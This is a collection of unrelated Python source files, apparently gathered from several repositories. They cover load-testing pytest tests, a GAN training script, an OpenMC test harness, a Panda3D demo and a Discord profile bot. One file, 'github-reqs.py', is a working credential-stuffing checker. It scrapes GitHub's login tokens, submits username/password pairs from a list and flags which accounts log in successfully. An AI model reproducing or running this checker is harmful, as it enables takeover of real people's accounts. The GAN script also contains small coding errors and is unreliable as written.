step_task_request_text_with_name(behave, RequestMethod.GET, 'test-name')
with pytest.raises(AssertionError):
step_task_request_text_with_name(behave, RequestMethod.POST, 'test-name')
behave.text = '{}'
step_task_request_text_with_name(behave, RequestMethod.POST, 'test-name')
def test_step_task_wait_seconds(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
with pytest.raises(AssertionError):
step_task_wait_seconds(behave, -1.0)
step_task_wait_seconds(behave, 1.337)
assert isinstance(grizzly.scenario.tasks[-1], WaitTask)
assert grizzly.scenario.tasks[-1].time == 1.337
def test_step_task_print_message(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
step_task_print_message(behave, 'hello {{ world }}')
assert isinstance(grizzly.scenario.tasks[-1], LogMessage)
assert grizzly.scenario.tasks[-1].message == 'hello {{ world }}'
def test_step_task_transform(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
with pytest.raises(ValueError) as ve:
step_task_transform(
behave,
jsondumps({
'document': {
'id': 'DOCUMENT_8483-1',
'title': 'TPM Report 2020',
},
}),
TransformerContentType.JSON,
'$.document.id',
'document_id',
)
assert 'TransformerTask: document_id has not been initialized' in str(ve)
grizzly.state.variables['document_id'] = 'None'
step_task_transform(
behave,
jsondumps({
'document': {
'id': 'DOCUMENT_8483-1',
'title': 'TPM Report 2020',
},
}),
TransformerContentType.JSON,
'$.document.id',
'document_id',
)
task = grizzly.scenario.tasks[-1]
assert isinstance(task, TransformerTask)
assert task.content_type == TransformerContentType.JSON
assert task.expression == '$.document.id'
assert task.variable == 'document_id'
assert len(grizzly.scenario.orphan_templates) == 0
step_task_transform(
behave,
jsondumps({
'document': {
'id': 'DOCUMENT_8483-1',
'title': 'TPM Report {{ year }}',
},
}),
TransformerContentType.JSON,
'$.document.id',
'document_id',
)
templates = grizzly.scenario.tasks[-1].get_templates()
assert len(templates) == 1
assert templates[-1] == jsondumps({
'document': {
'id': 'DOCUMENT_8483-1',
'title': 'TPM Report {{ year }}',
},
})
def test_step_task_client_get_endpoint(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
with pytest.raises(AssertionError) as ae:
step_task_client_get_endpoint(behave, 'mq.example.com', 'test')
assert 'could not find scheme in "mq.example.com"' in str(ae)
with pytest.raises(AssertionError) as ae:
step_task_client_get_endpoint(behave, 'mq://mq.example.com', 'test')
assert 'no client task registered for mq' in str(ae)
with pytest.raises(ValueError) as ve:
step_task_client_get_endpoint(behave, 'http://www.example.org', 'test')
assert 'HttpClientTask: variable test has not been initialized' in str(ve)
grizzly.state.variables['test'] = 'none'
assert len(grizzly.scenario.tasks) == 0
step_task_client_get_endpoint(behave, 'http://www.example.org', 'test')
assert len(grizzly.scenario.tasks) == 1
assert isinstance(grizzly.scenario.tasks[-1], HttpClientTask)
grizzly.state.variables['endpoint_url'] = 'https://example.org'
step_task_client_get_endpoint(behave, 'https://{{ endpoint_url }}', 'test')
task = grizzly.scenario.tasks[-1]
assert task.endpoint == '{{ endpoint_url }}'
def test_step_task_date(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
with pytest.raises(AssertionError) as ae:
step_task_date(behave, '{{ datetime.now() }} | offset=1D', 'date_variable')
assert 'variable date_variable has not been initialized' in str(ae)
grizzly.state.variables['date_variable'] = 'none'
step_task_date(behave, '{{ datetime.now() }} | offset=1D', 'date_variable')
assert len(grizzly.scenario.tasks) == 1
assert isinstance(grizzly.scenario.tasks[-1], DateTask)
task = grizzly.scenario.tasks[-1]
assert task.value == '{{ datetime.now() }}'
assert task.variable == 'date_variable'
assert task.arguments.get('offset') == '1D'
templates = task.get_templates()
assert len(templates) == 1
assert templates[0] == '{{ datetime.now() }}'
def test_step_task_client_put_endpoint_file_destination(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
behave.text = 'hello'
assert len(grizzly.scenario.orphan_templates) == 0
assert len(grizzly.scenario.tasks) == 0
with pytest.raises(AssertionError) as ae:
step_task_client_put_endpoint_file_destination(behave, 'file.json', 'http://example.org/put', 'uploaded-file.json')
assert 'step text is not allowed for this step expression' in str(ae.value)
behave.text = None
with pytest.raises(AssertionError) as ae:
step_task_client_put_endpoint_file_destination(behave, 'file-{{ suffix }}.json', 'http://{{ url }}', 'uploaded-file-{{ suffix }}.json')
assert 'source file cannot be a template' == str(ae.value)
step_task_client_put_endpoint_file_destination(behave, 'file-test.json', 'http://{{ url }}', 'uploaded-file-{{ suffix }}.json')
assert len(grizzly.scenario.tasks) == 1
task = grizzly.scenario.tasks[-1]
assert isinstance(task, HttpClientTask)
assert task.source == 'file-test.json'
assert task.destination == 'uploaded-file-{{ suffix }}.json'
assert task.endpoint == '{{ url }}'
templates = task.get_templates()
assert len(templates) == 2
assert sorted(templates) == sorted([
'{{ url }}',
'uploaded-file-{{ suffix }}.json',
])
def test_step_task_async_group_start(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = behave_fixture.grizzly
assert getattr(grizzly.scenario, 'async_group', '') is None
step_task_async_group_start(behave, 'async-test-1')
assert grizzly.scenario.async_group is not None
assert grizzly.scenario.async_group.name == 'async-test-1'
with pytest.raises(AssertionError) as ae:
step_task_async_group_start(behave, 'async-test-2')
assert str(ae.value) == 'async request group "async-test-1" has not been closed'
def test_step_task_async_group_end(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = behave_fixture.grizzly
assert len(grizzly.scenario.tasks) == 0
assert getattr(grizzly.scenario, 'async_group', '') is None
with pytest.raises(AssertionError) as ae:
step_task_async_group_close(behave)
assert str(ae.value) == 'no async request group is open'
step_task_async_group_start(behave, 'async-test-1')
with pytest.raises(AssertionError) as ae:
step_task_async_group_close(behave)
assert str(ae.value) == 'there are no requests in async group "async-test-1"'
assert grizzly.scenario.async_group is not None
step_task_request_text_with_name_to_endpoint(behave, RequestMethod.GET, 'test', direction=RequestDirection.FROM, endpoint='/api/test')
assert len(grizzly.scenario.tasks) == 0
step_task_async_group_close(behave)
assert len(grizzly.scenario.tasks) == 1
assert grizzly.scenario.async_group is None
| python |
from enum import Enum
from parse import parse
from datetime import datetime
import json
class CDFLogType(Enum):
NEW_COREHDF_INSTANCE = 1
PERSON_DETECTED = 2
NOTHING_DETECTED = 3
CANNOT_BE_INFERRED = 4
class CDFLog:
def __init__(self, logfile: str = 'log.txt'):
self.file_handler = open(logfile, 'r')
self.preprocess_cache = []
def get_last_logs(self, n: int, force_reload=False, reverse=False):
temp = []
if not len(self.preprocess_cache) or force_reload:
while line := self.file_handler.readline():
self.preprocess_cache.append(line)
for line in self.preprocess_cache[-n:]:
temp.append(CDFContext(line))
return temp if not reverse else list(reversed(temp))
def get_detected(self, limit: int = -1, force_reload=False):
temp = []
logs = self.get_last_logs(0, force_reload=force_reload, reverse=True)
for log in logs:
if log.infer_type() == CDFLogType.PERSON_DETECTED:
print('A')
# intentional bypass for limit = -1
if limit == 0 :
break
else :
limit -= 1
temp.append(log)
return temp
def clear_logs(self, limit: int = -1):
temp = []
class CDFContext:
def __init__(self, report: str):
parse_result = parse('[{level}/{time}] {message}', report)
self.level = parse_result['level']
self.datetime = datetime.strptime(parse_result['time'].split(',')[0], '%Y-%m-%d %H:%M:%S')
self.datetime_raw = parse_result['time']
self.message = parse_result['message']
def infer_type(self):
if self.message.startswith('Created'):
return CDFLogType.NEW_COREHDF_INSTANCE
if self.message.startswith('Detected'):
return CDFLogType.PERSON_DETECTED
if self.message.startswith('No person'):
return CDFLogType.NOTHING_DETECTED
return CDFLogType.CANNOT_BE_INFERRED
def json(self):
return json.dumps({'level': self.level,
'datetime': self.datetime_raw,
'message': self.message}) | python |
# -*- coding: utf-8 -*-
"""
NAME: github-reqs.py
AUTHOR: Ulyouth
VERSION: 1.0.0
DATE: 15.10.2020
DESC: A PyBullet-based script to check which GitHub logins are valid
using requests library.
"""
from chkutils import ChkUtils
def chkMain(ss, test, rst, captcha, data):
# Good practice, since 'data' can be both a list or string variable,
# depending on the number of elements in each line
if isinstance(data, list):
user = data[0]
pswd = data[1]
else:
# -200 = Exception = Terminate program!
return [-200, 'Invalid list format']
# Class containing a list of useful functions.
chk = ChkUtils()
# Login GET link.
lnk = 'https://github.com/login'
# Retrieve the login page.
r = chk.getnlog(ss, lnk, 'login.htm', 'github', user)
# Obtain the necessary login tokens.
auth_tok = chk.grab(r.text, 'authenticity_token" value="', '"')
tstamp = chk.grab(r.text, 'timestamp" value="', '"')
tsecret = chk.grab(r.text, 'timestamp_secret" value="', '"')
# Check if any tokens are missing.
if len(auth_tok) == 0 or len(tstamp) == 0 or len(tsecret) == 0:
# -1 = Error = Retry!
return [-1, 'Missing token']
elif test == 1:
# Print the tokens if running in test mode.
print('> authenticity_token: ' + auth_tok)
print('> timestamp: ' + tstamp)
print('> timestamp_secret: ' + tsecret)
# Login POST link
lnk = 'https://github.com/session'
# Login POST data dict
data = {'commit': 'Sign in',
'authenticity_token': auth_tok,
# Not sure whats the 'ga_id' for, but it works using always the
# same value.
'ga_id': '1348735984.1584973938',
'login': user,
'password': pswd,
'webauthn-support': 'supported',
'webauthn-iuvpaa-support': 'unsupported',
'return_to': '',
'allow_signup': '',
'client_id': '',
'integration': '',
'required_field_d202': '',
'timestamp': tstamp,
'timestamp_secret': tsecret }
# Attempt to login.
r = chk.postnlog(ss, lnk, 'login.htm', 'github', user, data = data)
# Evaluate the login attempt.
if r.text.find('Signed in as') != -1:
return [100, user] # 100 = Valid password (display in green)
elif r.text.find('Incorrect username or password.') != -1:
return [200, user] # 200 = Invalid password (display in red)
elif r.text.find('There have been several failed attempts') != -1:
return [-2, user] # -2 = Error = Retry!
else:
return [0, user] # 0 = Unknown = Skip (display in yellow)
| python |
def build_nn(params):
seq_length, vocabulary_size, layers, embedding_dim, upside_dim, downside_dim, lr, dropout = \
params['seq_length'], params['vocabulary_size'], params['layers'], params['embedding_dim'], params['upside_dim'], params['downside_dim'], params['lr'], params['dropout']
from tensorflow.keras import Input
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.models import Model
from tensorflow.keras.layers import GRU, Dense, Embedding, concatenate
embedding = Embedding(input_dim=vocabulary_size, input_length=seq_length, output_dim=embedding_dim, mask_zero=True)
upsideInput = Input(shape=(seq_length, ), name='upside_inp')
upside_i = embedding(upsideInput)
for i in range(layers):
upside_i = GRU(upside_dim, return_sequences=i < layers - 1, name='upside_%d' % (i + 1), dropout=dropout)(upside_i)
downsideInput = Input(shape=(seq_length, ), name='downside_inp')
downside_i = embedding(downsideInput)
for i in range(layers):
downside_i = GRU(downside_dim, return_sequences=i < layers - 1, name='downside_%d' % (i + 1), dropout=dropout)(downside_i)
output = Dense(1, activation='sigmoid')(concatenate([upside_i, downside_i]))
model = Model(
inputs=[upsideInput, downsideInput],
outputs=[output]
)
model.compile(loss='binary_crossentropy', optimizer=Adam(lr=lr), metrics=['accuracy'])
return model
| python |
import numpy as np
from keras.datasets import cifar10
from keras.models import Sequential, Model
from keras.layers import Input, Dense, LeakyReLU, BatchNormalization, ReLU
from keras.layers import Conv2D, Conv2DTranspose, Reshape, Flatten
from keras.optimizers import Adam
from keras import initializers
from keras.utils import plot_model, np_utils
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
image_generator = ImageDataGenerator(rescale=1)
import numpy as np
image_data = image_generator.flow_from_directory('/content/image',
#color_mode = "grayscale",
target_size = (64,64),
batch_size = 9993,
class_mode = None)
X_train = image_data.next()
print('data shape:', X_train.shape)
print(X_train.shape[0], 'train samples')
X_train = np.float32(X_train)
X_train = (X_train / 255 - 0.5) * 2
X_train = np.clip(X_train, -1, 1)
latent_dim = 100
init = initializers.RandomNormal(stddev=0.02)
generator = Sequential()
generator.add(Dense(4*4*512, input_shape=(latent_dim,), kernel_initializer=init))
generator.add(Reshape((4, 4, 512)))
generator.add(BatchNormalization())
generator.add(LeakyReLU(0.2))
generator.add(Conv2DTranspose(256, kernel_size=5, strides=2, padding='same'))
generator.add(BatchNormalization())
generator.add(LeakyReLU(0.2))
generator.add(Conv2DTranspose(128, kernel_size=5, strides=2, padding='same'))
generator.add(BatchNormalization())
generator.add(LeakyReLU(0.2))
generator.add(Conv2DTranspose(64, kernel_size=5, strides=2, padding='same'))
generator.add(BatchNormalization())
generator.add(LeakyReLU(0.2))
generator.add(Conv2DTranspose(3, kernel_size=5, strides=2, padding='same',
activation='tanh'))
img_shape = X_train[0].shape
discriminator = Sequential()
discriminator.add(Conv2D(64, kernel_size=5, strides=2, padding='same',
input_shape=(img_shape), kernel_initializer=init))
discriminator.add(LeakyReLU(0.2))
discriminator.add(Conv2D(128, kernel_size=5, strides=2, padding='same'))
discriminator.add(BatchNormalization())
discriminator.add(LeakyReLU(0.2))
discriminator.add(Conv2D(256, kernel_size=5, strides=2, padding='same'))
discriminator.add(BatchNormalization())
discriminator.add(LeakyReLU(0.2))
discriminator.add(Conv2D(512, kernel_size=5, strides=2, padding='same'))
discriminator.add(BatchNormalization())
discriminator.add(LeakyReLU(0.2))
discriminator.add(Flatten())
discriminator.add(Dense(1, activation='sigmoid'))
discriminator.compile(Adam(lr=0.0003, beta_1=0.5), loss='binary_crossentropy',
metrics=['binary_accuracy'])
discriminator.trainable = False
z = Input(shape=(latent_dim,))
img = generator(z)
decision = discriminator(img)
d_g = Model(inputs=z, outputs=decision)
d_g.compile(Adam(lr=0.0004, beta_1=0.5), loss='binary_crossentropy',
metrics=['binary_accuracy'])
epochs = 4000
batch_size = 32
smooth = 0.1
real = np.ones(shape=(batch_size, 1))
fake = np.zeros(shape=(batch_size, 1))
d_loss = []
g_loss = []
for e in range(epochs + 1):
for i in range(len(X_train) // batch_size):
# Train Discriminator weights
discriminator.trainable = True
# Real samples
X_batch = X_train[i*batch_size:(i+1)*batch_size]
d_loss_real = discriminator.train_on_batch(x=X_batch,
y=real * (1 - smooth))
# Fake Samples
z = np.random.normal(loc=0, scale=1, size=(batch_size, latent_dim))
X_fake = generator.predict_on_batch(z)
d_loss_fake = discriminator.train_on_batch(x=X_fake, y=fake)
# Discriminator loss
d_loss_batch = 0.5 * (d_loss_real[0] + d_loss_fake[0])
# Train Generator weights
discriminator.trainable = False
g_loss_batch = d_g.train_on_batch(x=z, y=real)
print(
'epoch = %d/%d, batch = %d/%d, d_loss=%.3f, g_loss=%.3f' % (e + 1, epochs, i, len(X_train) // batch_size, d_loss_batch, g_loss_batch[0]),
100*' ',
end='\r'
)
d_loss.append(d_loss_batch)
g_loss.append(g_loss_batch[0])
print('epoch = %d/%d, d_loss=%.3f, g_loss=%.3f' % (e + 1, epochs, d_loss[-1], g_loss[-1]), 100*' ')
if e % 10 == 0:
samples = 10
x_fake = generator.predict(np.random.normal(loc=0, scale=1, size=(samples, latent_dim)))
for k in range(samples):
plt.subplot(2, 5, k + 1, xticks=[], yticks=[])
plt.imshow(((x_fake[k] + 1)* 127).astype(np.uint8))
plt.tight_layout()
plt.savefig('fig'+e+'.png')
| python |
#!/usr/bin/env python
import os
import sys
import glob
import hashlib
import itertools
sys.path.insert(0, os.pardir)
from testing_harness import PyAPITestHarness
import openmc
class TallySliceMergeTestHarness(PyAPITestHarness):
def _build_inputs(self):
# The summary.h5 file needs to be created to read in the tallies
self._input_set.settings.output = {'summary': True}
# Initialize the tallies file
tallies_file = openmc.Tallies()
# Define nuclides and scores to add to both tallies
self.nuclides = ['U-235', 'U-238']
self.scores = ['fission', 'nu-fission']
# Define filters for energy and spatial domain
low_energy = openmc.Filter(type='energy', bins=[0., 0.625e-6])
high_energy = openmc.Filter(type='energy', bins=[0.625e-6, 20.])
merged_energies = low_energy.merge(high_energy)
cell_21 = openmc.Filter(type='cell', bins=[21])
cell_27 = openmc.Filter(type='cell', bins=[27])
distribcell_filter = openmc.Filter(type='distribcell', bins=[21])
self.cell_filters = [cell_21, cell_27]
self.energy_filters = [low_energy, high_energy]
# Initialize cell tallies with filters, nuclides and scores
tallies = []
for cell_filter in self.energy_filters:
for energy_filter in self.cell_filters:
for nuclide in self.nuclides:
for score in self.scores:
tally = openmc.Tally()
tally.estimator = 'tracklength'
tally.add_score(score)
tally.add_nuclide(nuclide)
tally.add_filter(cell_filter)
tally.add_filter(energy_filter)
tallies.append(tally)
# Merge all cell tallies together
while len(tallies) != 1:
halfway = int(len(tallies) / 2)
zip_split = zip(tallies[:halfway], tallies[halfway:])
tallies = list(map(lambda xy: xy[0].merge(xy[1]), zip_split))
# Specify a name for the tally
tallies[0].name = 'cell tally'
# Initialize a distribcell tally
distribcell_tally = openmc.Tally(name='distribcell tally')
distribcell_tally.estimator = 'tracklength'
distribcell_tally.add_filter(distribcell_filter)
distribcell_tally.add_filter(merged_energies)
for score in self.scores:
distribcell_tally.add_score(score)
for nuclide in self.nuclides:
distribcell_tally.add_nuclide(nuclide)
# Add tallies to a Tallies object
tallies_file = openmc.Tallies((tallies[0], distribcell_tally))
# Export tallies to file
self._input_set.tallies = tallies_file
super(TallySliceMergeTestHarness, self)._build_inputs()
def _get_results(self, hash_output=False):
"""Digest info in the statepoint and return as a string."""
# Read the statepoint file.
statepoint = glob.glob(os.path.join(os.getcwd(), self._sp_name))[0]
sp = openmc.StatePoint(statepoint)
# Extract the cell tally
tallies = [sp.get_tally(name='cell tally')]
# Slice the tallies by cell filter bins
cell_filter_prod = itertools.product(tallies, self.cell_filters)
tallies = map(lambda tf: tf[0].get_slice(filters=[tf[1].type],
filter_bins=[tf[1].get_bin(0)]), cell_filter_prod)
# Slice the tallies by energy filter bins
energy_filter_prod = itertools.product(tallies, self.energy_filters)
tallies = map(lambda tf: tf[0].get_slice(filters=[tf[1].type],
filter_bins=[(tf[1].get_bin(0),)]), energy_filter_prod)
# Slice the tallies by nuclide
nuclide_prod = itertools.product(tallies, self.nuclides)
tallies = map(lambda tn: tn[0].get_slice(nuclides=[tn[1]]), nuclide_prod)
# Slice the tallies by score
score_prod = itertools.product(tallies, self.scores)
tallies = map(lambda ts: ts[0].get_slice(scores=[ts[1]]), score_prod)
tallies = list(tallies)
# Initialize an output string
outstr = ''
# Append sliced Tally Pandas DataFrames to output string
for tally in tallies:
df = tally.get_pandas_dataframe()
outstr += df.to_string()
# Merge all tallies together
while len(tallies) != 1:
halfway = int(len(tallies) / 2)
zip_split = zip(tallies[:halfway], tallies[halfway:])
tallies = list(map(lambda xy: xy[0].merge(xy[1]), zip_split))
# Append merged Tally Pandas DataFrame to output string
df = tallies[0].get_pandas_dataframe()
outstr += df.to_string()
# Extract the distribcell tally
distribcell_tally = sp.get_tally(name='distribcell tally')
# Sum up a few subdomains from the distribcell tally
sum1 = distribcell_tally.summation(filter_type='distribcell',
filter_bins=[0,100,2000,30000])
# Sum up a few subdomains from the distribcell tally
sum2 = distribcell_tally.summation(filter_type='distribcell',
filter_bins=[500,5000,50000])
# Merge the distribcell tally slices
merge_tally = sum1.merge(sum2)
# Append merged Tally Pandas DataFrame to output string
df = merge_tally.get_pandas_dataframe()
outstr += df.to_string()
# Hash the results if necessary
if hash_output:
sha512 = hashlib.sha512()
sha512.update(outstr.encode('utf-8'))
outstr = sha512.hexdigest()
return outstr
def _cleanup(self):
super(TallySliceMergeTestHarness, self)._cleanup()
f = os.path.join(os.getcwd(), 'tallies.xml')
if os.path.exists(f): os.remove(f)
if __name__ == '__main__':
harness = TallySliceMergeTestHarness('statepoint.10.h5', True)
harness.main()
| python |
from onnxquantizer import Quantizer
import config as cfg
import os
import cv2
import numpy as np
def prehandle(img_path, dst_size):
img = cv2.imread(img_path, cv2.IMREAD_COLOR)
resized = cv2.resize(img, dsize=(dst_size[1], dst_size[0]), interpolation=cv2.INTER_LINEAR)
return resized
def main():
#load rpn model
rpn_model = Quantizer(model_path=cfg.FACE_DET_MODEL_PATH,
ini_file=cfg.FACE_DET_SAVE_QUANTI_PATH,
input_quanti_bits=cfg.FACE_DET_INPUT_QUANTI_BITS,
quanti_bits=cfg.FACE_DET_QUANTI_BITS,
output_quanti_method=cfg.QUANTI_OUTPUT_METHOD,
weight_quanti_type=cfg.WEIGHT_QUANTI_TYPE,
save_new_model_path=cfg.NEW_FACE_DET_MODEL_PATH,
quanti_layer_type=cfg.QANTI_LAYER_TYPE,
middle_layer_output_shape=cfg.FACE_DET_MIDDLE_LAYER_OUTPUT_SHAPE,
merge_layer_type=cfg.MERGE_LAYER_TYPE,
merge_layer_indexs=cfg.FACE_DET_MERGE_LAYER_SHAPE_INDEX,
merge_layer_shapes=cfg.FACE_DET_MERGE_LAYER_SHAPE,
dequan_layer_name=cfg.FACE_DET_DEQUANTI_LAYER_NAME,
do_detection=False,
input_do_quanti=False)
file_list = os.listdir(cfg.QUANTI_DATA_PATH)
for file_name in file_list:
file_name = cfg.QUANTI_DATA_PATH + file_name
input_data = prehandle(file_name, cfg.IMG_SHAPE)
input_data = input_data.transpose(2, 0, 1)
input_data_ = input_data.flatten().reshape(cfg.FACE_DET_INPUT_SHAPE) # = pfe_output.detach().numpy()
rpn_model.forword(np.array(input_data_.astype(np.float32)))
print('*********************************************')
# break
print('save param...')
rpn_model.save_param()
return
if __name__ == '__main__':
main()
| python |
import logging
import logging.config
def configure_logging(config, disable_existing=False):
"""
Set up (process-global!) loggers according to given app configuration.
Look for 'logging' key in [app] config section, which should be the path to
a logging config file in the format expected by logging.config.fileConfig.
"""
logging_config = config.getpath('app.logging', None)
if logging_config is not None:
logging.config.fileConfig(
logging_config, disable_existing_loggers=disable_existing)
| python |
# A simple demo of the mesh manager.
# Generates and renders a single tile with some ferns and trees
#
# INSTRUCTIONS:
#
# Launch from outside terrain, meaning launch with:
# python terrain/meshManager/main.py
import sys
sys.path.append(".")
from panda3d.core import *
from panda3d.core import Light,AmbientLight,DirectionalLight
from panda3d.core import NodePath
from panda3d.core import Vec3,Vec4,Mat4,VBase4,Point3
from direct.task.Task import Task
from direct.showbase.ShowBase import ShowBase
from terrain.meshManager import meshManager
from terrain.meshManager import treeFactory
from terrain.meshManager import fernFactory
base = ShowBase()
base.disableMouse()
class Flat():
def height(self,x,y): return 0
factories=[treeFactory.TreeFactory(),fernFactory.FernFactory()]
t=meshManager.MeshManager(factories)
tf=treeFactory.TreeFactory()
ff=fernFactory.FernFactory()
factories=[tf,ff]
meshManager=meshManager.MeshManager(factories)
size=600.0
tileFactory=meshManager.tileFactory(size)
x=0.0
y=0.0
tile=Flat()
tileNode=tileFactory(x,y,tile)
tileNode.reparentTo(base.render)
dlight = DirectionalLight('dlight')
dlnp = render.attachNewNode(dlight)
dlnp.setHpr(0, 0, 0)
render.setLight(dlnp)
alight = AmbientLight('alight')
alnp = render.attachNewNode(alight)
render.setLight(alnp)
#rotating light to show that normals are calculated correctly
def updateLight(task):
base.camera.setHpr(task.time/50.0*360,0,0)
#base.camera.setP(0)
base.camera.setPos(size/2,size/2,5)
#base.camera.setPos(tileNode,2,task.time*4,5)
base.camera.setP(8)
#t.update(base.camera)
h=task.time/20.0*360+180
dlnp.setHpr(0,h,0)
h=h+90
h=h%360
h=min(h,360-h)
#h is now angle from straight up
hv=h/180.0
hv=1-hv
sunset=max(0,1.0-abs(hv-.5)*8)
sunset=min(1,sunset)
if hv>.5: sunset=1
#sunset=sunset**.2
sunset=VBase4(0.8, 0.5, 0.0, 1)*sunset
sun=max(0,hv-.5)*2*4
sun=min(sun,1)
dColor=(VBase4(0.8, 0.7, 0.7, 1)*sun*2+sunset)
dlight.setColor(dColor)
aColor=VBase4(0.1, 0.3, 0.8, 1)*sun*2.6+VBase4(0.2, 0.2, 0.3, 1)*2.0
alight.setColor(aColor*(5-dColor.length())*(1.0/5))
return Task.cont
taskMgr.add(updateLight, "rotating Light")
base.run() | python |
import os
import re
import discord
from discord import MessageType
from discord.commands import slash_command, Option, message_command
from discord.ext import commands
from sqlalchemy import desc
from . import XpSys
import PictureCreator
from PictureCreator.utils import ConvrterToCI
from models.Emojies import Emojie
from models.IgnorLists import IgnoreList
from models.Members import Member
from models.database import Session
from models.BoostLists import BoostList
session = Session()
class Profile(commands.Cog):
def __init__(self, bot):
self.bot = bot
XpSys.init()
@message_command(name="Получить профиль")
async def getProfile(self, ctx, message: discord.Message):
author = message.author
path = "Temp/{}.png".format(author.id)
info = session.query(Member) \
.filter(Member.MemberId == author.id) \
.filter(Member.ServerId == author.guild.id).first()
PictureCreator.CreateProfile(author, info).save(path)
file = discord.File(path, filename="profile.png")
await ctx.send(file=file)
os.remove(path)
@slash_command(
name='profile',
description="Выводит профиль пользователя."
)
async def profile(self, ctx,
member: Option(discord.Member, description="Выберите пользователя, чей профиль вывести",
required=False, default=None)):
if member:
author = member
else:
author = ctx.author
path = "Temp/{}.png".format(author.id)
info = session.query(Member) \
.filter(Member.MemberId == author.id) \
.filter(Member.ServerId == author.guild.id).first()
PictureCreator.CreateProfile(author, info).save(path)
file = discord.File(path, filename="profile.png")
await ctx.send(file=file)
os.remove(path)
@slash_command(
name='setbg',
description="Устанавливает задний фон для профиля. Приложить изображение или ссылку на изображение.",
)
async def setbg(self, ctx,
img: Option(discord.Attachment, "Изображение для заднего фона", required=False, default=None),
url: Option(str, "Ссылка на задний фон", required=False, default=None)):
if url:
try:
PictureCreator.SetBG(ctx.guild.id, ctx.author.id, url)
except:
await ctx.send('Некорректная ссылка на изображение.')
return
elif img:
if 'image' not in img.content_type:
await ctx.send('Некорректное изображение.')
return
PictureCreator.SetBG(ctx.guild.id, ctx.author.id, img.url)
else:
try:
os.remove("src/Images/Usr/{}/{}/profile.png".format(ctx.guild.id, ctx.author.id))
except:
pass
path = "Temp/{}.png".format(ctx.author.id)
info = session.query(Member) \
.filter(Member.MemberId == ctx.author.id) \
.filter(Member.ServerId == ctx.author.guild.id).first()
PictureCreator.CreateProfile(ctx.author, info).save(path)
file = discord.File(path, filename="profile.png")
await ctx.send(file=file)
os.remove(path)
@slash_command(
name='settext',
description="Задаёт подпись профиля."
)
async def settext(self, ctx, text: Option(str, description="Подпись профиля.", required=False, default="")):
member = session.query(Member) \
.filter(Member.MemberId == ctx.author.id) \
.filter(Member.ServerId == ctx.guild.id).first()
member.Info = text
path = "Temp/{}.png".format(ctx.author.id)
info = session.query(Member) \
.filter(Member.MemberId == ctx.author.id) \
.filter(Member.ServerId == ctx.author.guild.id).first()
PictureCreator.CreateProfile(ctx.author, info).save(path)
file = discord.File(path, filename="profile.png")
await ctx.send(file=file)
os.remove(path)
@message_command(name="Получить аватар")
async def getAvatar(self, ctx, message: discord.Message):
path = PictureCreator.utils.GetAvatarFromUrl(PictureCreator.GetAvatar(message.author, size=4096))
file = discord.File(path, filename="avatar.gif")
await ctx.send("Avatar " + message.author.name, file=file)
@slash_command(
name='avatar',
description="Выводит аватар пользователя."
)
async def avatar(self, ctx, member: Option(discord.Member, "Пользователь", required=False, default=None)):
if member:
author = member
else:
author = ctx.author
path = PictureCreator.utils.GetAvatarFromUrl(PictureCreator.GetAvatar(author, size=4096))
file = discord.File(path, filename="avatar.gif")
await ctx.send("Avatar " + author.name, file=file)
@message_command(name="Получить ранг")
async def getRank(self, ctx, message: discord.Message):
author = message.author
path = "Temp/{}.png".format(author.id)
info = session.query(Member) \
.filter(Member.MemberId == author.id) \
.filter(Member.ServerId == author.guild.id).first()
PictureCreator.CreateRank(author, info).save(path)
file = discord.File(path, filename="profile.png")
await ctx.send(file=file)
os.remove(path)
@slash_command(
name='rank',
description="Выводит ранг пользователя.",
)
async def rank(self, ctx, member: Option(discord.Member, "Пользователь", required=False, default=None)):
if member:
author = member
else:
author = ctx.author
path = "Temp/{}.png".format(author.id)
info = session.query(Member) \
.filter(Member.MemberId == author.id) \
.filter(Member.ServerId == author.guild.id).first()
PictureCreator.CreateRank(author, info).save(path)
file = discord.File(path, filename="profile.png")
await ctx.send(file=file)
os.remove(path)
@slash_command(
name='top',
description="Выводит рейтинг сервера."
)
async def top(self, ctx,
cat: Option(str, "Категория рейтинга", default='Опыт', choices=["Опыт", "Упоминания", "Эмоджи"],
required=False),
page: Option(int, 'Страница рейтинга', min_value=1, default=1, required=True)):
members = []
page = int(page)
if cat.isnumeric():
page = int(cat)
cat = "Опыт"
page -= 1
if cat == 'Опыт':
for member in session.query(Member) \
.filter(Member.IsAlive) \
.filter(Member.ServerId == ctx.guild.id) \
.order_by(desc(Member.TotalXp)).limit(5).offset(5 * page):
mem = ctx.guild.get_member(member.MemberId)
members.append({
"mem": mem,
"data": ConvrterToCI(round(member.TotalXp, 2)) + "xp",
"url": PictureCreator.GetAvatar(mem, size=64)
})
elif cat == "Упоминания":
for member in session.query(Member) \
.filter(Member.IsAlive) \
.filter(Member.ServerId == ctx.guild.id) \
.order_by(desc(Member.Mentions)).limit(5).offset(5 * page):
mem = ctx.guild.get_member(member.MemberId)
members.append({
"mem": mem,
"url": PictureCreator.GetAvatar(mem, size=64),
"data": str(member.Mentions) + " mentions"
})
elif cat == "Эмоджи":
for emojie in session.query(Emojie) \
.filter(Emojie.ServerId == ctx.guild.id) \
.order_by(desc(Emojie.CountUsage)).limit(5).offset(5 * page):
emoji = await ctx.guild.fetch_emoji(emojie.Id)
members.append({
"mem": emoji,
"url": emoji.url,
"data": str(emojie.CountUsage) + " detected"
})
else:
await ctx.send("Параметр не найден!")
return
path = "Temp/top{}.png".format(page)
PictureCreator.GetTop(members, page).save(path)
file = discord.File(path, filename="top.png")
await ctx.send(file=file)
os.remove(path)
@commands.Cog.listener()
async def on_message(self, message):
if message.author.bot or message.type == MessageType.new_member:
return
ignoreList = session.query(IgnoreList) \
.filter(IgnoreList.ServerId == message.guild.id) \
